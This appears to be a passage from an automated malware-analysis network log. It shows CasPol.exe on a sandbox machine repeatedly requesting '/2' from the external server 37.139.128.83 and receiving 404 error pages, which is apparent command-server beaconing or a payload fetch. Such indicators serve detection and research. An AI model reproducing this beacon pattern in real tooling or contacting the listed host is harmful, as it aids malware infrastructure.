                                                    Mar 20, 2023 13:20:49.293040991 CET316INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:20:49.293061972 CET317INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:20:49.293082952 CET317INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:20:49.293103933 CET317INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    25192.168.11.204983437.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:20:59.318969011 CET317OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:20:59.346731901 CET318INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:20:59 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:20:59.346787930 CET319INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:20:59.346818924 CET319INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:20:59.346847057 CET319INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:20:59.346941948 CET319INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    26192.168.11.204983637.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:21:09.379271984 CET327OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:21:09.426351070 CET327INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:21:09 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:21:09.426366091 CET328INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:21:09.426376104 CET328INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:21:09.426386118 CET328INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:21:09.426542997 CET328INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    27192.168.11.204983737.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:21:19.454461098 CET329OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:21:19.535763979 CET329INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:21:19 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:21:19.535883904 CET330INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:21:19.535974026 CET330INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:21:19.536063910 CET331INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:21:19.536145926 CET331INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    28192.168.11.204983937.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:21:29.561847925 CET332OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:21:29.604331970 CET339INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:21:29 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:21:29.604429007 CET339INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:21:29.604475975 CET339INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:21:29.604521036 CET340INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:21:29.604562044 CET340INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    29192.168.11.204984037.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:21:39.638174057 CET340OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:21:39.703213930 CET341INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:21:39 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:21:39.703282118 CET341INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:21:39.703327894 CET342INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:21:39.703371048 CET342INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:21:39.703416109 CET342INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    3192.168.11.204980037.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:17:17.180488110 CET188OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:17:17.208664894 CET188INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:17:17 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:17:17.208734035 CET189INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:17:17.208784103 CET189INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:17:17.208827019 CET189INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:17:17.208869934 CET190INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    30192.168.11.204984137.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:21:49.730093002 CET343OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:21:49.794543028 CET344INHTTP/1.1 404 Not Found
